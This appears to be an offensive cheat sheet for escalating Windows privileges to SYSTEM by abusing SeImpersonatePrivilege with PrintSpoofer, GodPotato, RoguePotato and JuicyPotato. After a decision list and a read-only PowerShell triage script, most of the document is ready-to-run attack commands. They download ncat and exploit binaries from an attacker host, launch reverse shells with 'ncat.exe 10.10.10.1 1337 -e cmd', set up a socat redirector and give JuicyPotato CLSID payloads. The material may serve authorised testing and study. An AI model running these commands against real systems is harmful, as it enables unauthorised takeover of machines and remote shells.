SeImpersonatePrivilege Exploit

  • Check Your Privileges: First and foremost, verify that your current user context has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

  • Is the Print Spooler Running? Use sc query spooler to check the status of the Print Spooler service. If it's running, PrintSpoofer is often your most direct route to SYSTEM.

  • Assess the Windows Version:

    • Modern & Patched (Windows 10/11, Server 2019/2022):

      • Start with God Potato or its variants. Its reliance on a different vulnerability makes it highly effective.

      • If that fails, try Rogue Potato, which is specifically designed for these newer operating systems.

      • Juicy Potato NG / Sweet Potato are also strong contenders here, as they are designed for modern systems.

    • Older Systems (Windows 7, 8, 10 pre-1809, Server 2008-2016):

      • Juicy Potato is a solid and reliable choice. Its flexibility with CLSIDs makes it a favorite.

      • If for some reason Juicy Potato doesn't work, you can fall back to the original Rotten Potato.

  • Consider the Environment: In some highly restricted environments, outbound DCOM traffic might be blocked, or certain services may be disabled. If one Potato fails, don't hesitate to try another, as they leverage different communication channels and services.
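As an added example (not code from the original page or from any of the Potato projects), a PowerShell function that runs the three checks above on the current host and reports which branch of the list applies, handy when auditing which service accounts expose this path. The function name is hypothetical and the build number 17763 (Windows 10 1809 / Server 2019) is my assumption for the list's "pre-1809" boundary.

```powershell
# Added triage script; not from the original page or the Potato projects.
# Assumes Windows PowerShell 5.1 or later with whoami.exe available on PATH.
function Get-ImpersonationTriage {
    # 1. Token privileges: `whoami /priv` prints one row per privilege held,
    #    whether Enabled or Disabled; the privilege name is the first column.
    $privLines = whoami /priv 2>$null
    $hasImpersonate = [bool]($privLines | Select-String -Pattern '^SeImpersonatePrivilege\s' -Quiet)
    $hasAssignToken = [bool]($privLines | Select-String -Pattern '^SeAssignPrimaryTokenPrivilege\s' -Quiet)
    $exposed = $hasImpersonate -or $hasAssignToken

    # 2. Print Spooler state, the PowerShell equivalent of `sc query spooler`.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')

    # 3. OS build. Build 17763 is Windows 10 1809 / Server 2019, the cut-off
    #    the list above draws between "older" and "modern & patched" systems.
    $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuildNumber
    $isModern = $build -ge 17763

    # Map the three answers onto the branches of the decision list.
    if (-not $exposed) {
        $branch = 'Not exposed: token holds neither privilege'
    } elseif ($spoolerRunning) {
        $branch = 'PrintSpoofer branch (spooler running)'
    } elseif ($isModern) {
        $branch = 'Modern branch: GodPotato, then RoguePotato, then JuicyPotatoNG / SweetPotato'
    } else {
        $branch = 'Older branch: JuicyPotato, then RottenPotato'
    }

    [pscustomobject]@{
        SeImpersonatePrivilege        = $hasImpersonate
        SeAssignPrimaryTokenPrivilege = $hasAssignToken
        SpoolerRunning                = $spoolerRunning
        ProductName                   = $cv.ProductName
        OSBuild                       = $build
        Branch                        = $branch
    }
}

Get-ImpersonationTriage | Format-List
```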


# On the target: confirm the token holds SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
whoami /priv

# On the attacker: listener for the reverse shell
nc -lnvp 1337

# DOWNLOAD NCAT FROM ATTACKER (pick the build matching the target's architecture)
# 32bit
iwr -uri "http://10.10.10.1:8888/nc.exe" -Outfile ncat.exe
# 64bit
iwr -uri "http://10.10.10.1:8888/nc64.exe" -Outfile ncat.exe

----------------------------------------------------------------

# PRINT SPOOFER (requires the Print Spooler service to be running; download only the build matching the target's architecture)
# 32bit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe" -OutFile PrintSpoofer.exe
# 64bit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exe

.\PrintSpoofer.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"

----------------------------------------------------------------
# Get .NET version (GodPotato ships one binary per .NET runtime; pick the one the target has installed)
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP"

# GODPOTATO-NET (download only the build matching the installed .NET version)
# .NET 2.0
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -OutFile GodPotato.exe
# .NET 3.5
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -OutFile GodPotato.exe
# .NET 4.x
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -OutFile GodPotato.exe

.\GodPotato.exe -c "C:\TEMP\ncat.exe 10.10.10.1 1337 -e cmd"


# ROGUE POTATO
https://github.com/antonioCoco/RoguePotato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
# RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode

# JUICY POTATO (-l listener port, -p program to launch, -a its arguments, -t CreateProcess call to use, -c CLSID of the COM server to abuse)
https://github.com/ohpe/juicy-potato
https://github.com/mishmashclone/swisskyrepo-PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#juicy-potato-abusing-the-golden-privileges
JuicyPotato.exe -l 9999 -p c:\inetpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}
JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"
# output of the last command:
    Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337

# ROTTEN POTATO (the original; fallback for older systems when JuicyPotato fails)
https://github.com/breenmachine/RottenPotatoNG